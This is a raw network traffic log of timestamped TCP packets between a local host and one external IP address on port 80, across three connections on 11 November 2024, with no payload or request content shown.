Nov 11, 2024 08:33:43.509497881 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.509542942 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.509685040 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.509696960 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.509716034 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.509738922 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.535453081 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.535490990 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.535609007 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.535619974 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.535631895 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.535645008 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.535655975 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.535662889 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.535676956 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.536134005 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536149025 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536161900 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536169052 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.536196947 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.536513090 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536545038 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536557913 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536592007 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.536617041 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536628962 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.536653996 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.537384987 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.537396908 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.537408113 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.537429094 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.537456036 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.537457943 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.537467957 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.537504911 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.538136959 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.538206100 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.538209915 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.538244963 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.538259029 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.538270950 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.538295031 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.539026022 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539038897 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539047956 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539063931 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.539067030 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539079905 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539083004 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.539124012 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.539849043 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539922953 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539933920 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.539958000 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.540035009 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540046930 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540076971 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.540713072 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540724039 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540735960 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540750027 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.540774107 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540775061 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.540786982 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.540817976 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.541574955 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.541585922 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.541598082 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.541623116 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.541646004 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.541659117 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.541686058 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.542411089 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.542423010 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.542433023 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.542444944 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.542468071 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.542468071 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543032885 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543051958 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543062925 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543068886 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.543104887 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543107033 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.543755054 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543766975 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543776989 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543792009 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.543807030 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:43.543809891 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543821096 CET	80	50040	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:43.543868065 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:44.289181948 CET	50040	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.307861090 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.312876940 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.312952995 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.325675011 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.330622911 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330632925 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330651999 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330657959 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330660105 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330710888 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330719948 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330735922 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.330744982 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837225914 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837236881 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837248087 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837280035 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837285042 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837304115 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.837338924 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.837393999 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837399006 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837444067 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.837575912 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837611914 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837625980 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.837739944 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.837795973 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.842319012 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.842369080 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.842375994 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.842386007 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.842437983 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.842437983 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.892255068 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.892297029 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.892359972 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.918478012 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.918483019 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.918529987 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.918538094 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.918545008 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.918555975 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.918561935 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.918629885 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.918629885 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.919030905 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919065952 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919073105 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919107914 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919122934 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.919158936 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.919610023 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919615984 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919627905 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919665098 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.919687033 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919692993 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919702053 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.919744968 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.920625925 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.920631886 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.920643091 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.920675993 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.920682907 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.920684099 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.920746088 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.959320068 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.959327936 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.959333897 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.959372997 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.959405899 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.999651909 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999658108 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999691963 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999751091 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.999778986 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999824047 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:45.999825001 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999844074 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999850035 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:45.999901056 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.000138044 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000150919 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000164986 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000170946 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000181913 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000215054 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.000215054 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.000751972 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000756979 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000768900 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000802994 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.000828981 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000834942 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000845909 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000855923 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000894070 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.000912905 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.000922918 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.000963926 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.001544952 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.001614094 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.001619101 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.001632929 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.001656055 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.001658916 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.001698017 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.002535105 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002541065 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002547026 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002587080 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.002587080 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.002620935 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002628088 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002634048 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002640963 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.002680063 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.002700090 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.002701998 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003078938 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003084898 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003091097 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003119946 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.003211975 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003217936 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003228903 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003235102 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003242970 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.003261089 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.003298998 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.004095078 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.004101992 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.004112959 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.004168987 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.004168987 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.040756941 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.040764093 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.040776014 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.040781975 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.040787935 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.040806055 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.040855885 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.080881119 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.080889940 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.080898046 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.080929041 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.080944061 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.080950022 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.080970049 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.080990076 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081028938 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081034899 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081042051 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081084967 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081090927 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081120014 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081127882 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081329107 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081342936 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081350088 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081367970 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081389904 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081446886 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081454039 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081495047 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081708908 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081716061 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081722975 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081785917 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081806898 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081814051 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081825972 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081834078 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081840038 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.081870079 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.081895113 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082212925 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082220078 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082231998 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082293987 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082298994 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082304955 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082315922 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082321882 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082349062 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082376957 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082381964 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082381964 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082427025 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082823992 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082830906 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082838058 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082879066 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082879066 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.082916021 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082926989 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082933903 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082941055 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.082973003 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083022118 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083024979 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083031893 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083038092 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083044052 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083066940 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083098888 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083101988 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083108902 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083174944 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083746910 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083753109 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083760023 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083806992 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083838940 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083844900 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083856106 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083862066 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.083935976 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.083991051 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084002018 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084007978 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084019899 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084027052 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084034920 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084045887 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.084076881 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.084119081 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.084705114 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084717035 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084722996 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084754944 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.084760904 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084770918 CET	80	50041	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:46.084794998 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.084827900 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:46.835190058 CET	50041	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:47.852932930 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:47.858016968 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:47.858083010 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:47.866147995 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:47.870982885 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.381830931 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.381983995 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.381990910 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382003069 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382090092 CET	80	50042	38.47.237.27	192.168.2.4
